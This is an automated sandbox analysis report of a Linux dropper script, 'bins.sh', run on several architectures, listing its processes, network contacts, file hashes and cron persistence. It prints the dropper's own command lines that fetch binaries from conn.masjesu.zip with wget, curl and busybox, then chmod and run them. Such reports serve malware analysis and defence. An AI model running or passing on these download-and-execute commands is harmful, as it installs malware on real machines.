Analysis Overview
SHA256
5712c96a6f61d81d03e6fadb1ab213cbced525bc1548981318d3dfe47f03c9c6
Threat Level: Shows suspicious behavior
The file bins.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Renames itself
Creates/modifies Cron job
Enumerates running processes
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-04 20:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 84.17.50.9:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
7s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
| MD5 | 6c583043d91c55aa470c08c87058e917 |
| SHA1 | abf65a5b9bba69980278ad09356e53de8bb89439 |
| SHA256 | 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948 |
| SHA512 | 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-04 20:25
Reported
2024-12-04 20:28
Platform
debian9-mipsel-20240226-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.FUV38W | /usr/bin/crontab | N/A |
Enumerates running processes
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/9/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/16/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/684/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/115/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/485/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/828/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/12/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/14/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/19/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/79/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/831/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/18/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/23/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/105/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/13/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/144/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/37/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/372/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/705/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/7/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/20/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/36/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/73/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/704/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/385/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/6/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/70/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/76/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/317/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/343/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/74/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/152/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/344/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/408/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/69/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/224/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/311/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/373/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/825/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/17/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/21/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/22/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/78/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/116/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/384/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/829/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/4/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/5/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/15/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/83/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/168/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/703/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/826/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/3/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/8/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/24/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
| File opened for reading | /proc/77/cmdline | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/wget | N/A |
| File opened for modification | /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/chmod
[chmod 777 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
[./3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/bin/sh
[sh -c crontab -l]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c crontab -]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:443 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c
| MD5 | 6c583043d91c55aa470c08c87058e917 |
| SHA1 | abf65a5b9bba69980278ad09356e53de8bb89439 |
| SHA256 | 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948 |
| SHA512 | 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5 |
/var/spool/cron/crontabs/tmp.FUV38W
| MD5 | 7efe52b2de6e71ac50b770cf32218aac |
| SHA1 | ade25d2ddfbbbf690febf439ab6c9be4b484d402 |
| SHA256 | c81fa91db4d9fa0605ef5576fa0e3bc4fb94f0ece0fa242c1e8fabf826f91d15 |
| SHA512 | f96c20247d84eed1819b80526f6671b3350cd908be62eda99e9392e0716735ba9b3b43f54bbf314ee1b188cdfb6bc1e21d16f27e10d52ef01b0bb57f3d74604f |